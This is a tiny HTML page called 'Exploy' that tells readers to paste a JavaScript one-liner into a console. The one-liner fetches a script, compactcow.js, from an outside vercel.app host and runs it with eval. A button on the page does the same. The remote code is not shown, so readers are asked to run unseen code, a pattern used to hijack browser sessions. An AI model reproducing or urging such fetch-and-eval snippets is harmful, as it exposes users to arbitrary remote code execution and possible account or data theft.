<!DOCTYPE html>
<html>
    <head>
        <title>Exploy</title>
    </head>
    <body>
        <p>exploy lol</p>
        <script src='script.js'></script>
        <p>Run <code>fetch(`https://rainbowcdn.vercel.app/exploy/compactcow.js`).then(data=>{data.text().then(text=>{eval(text)})});</code> in a javascript thing or whatever. idk</p>
        <button onclick="fetch(`https://rainbowcdn.vercel.app/exploy/compactcow.js`).then(data=>{data.text().then(text=>{eval(text)})});">Try it [doesn't work lol]</button>
    </body>
</html>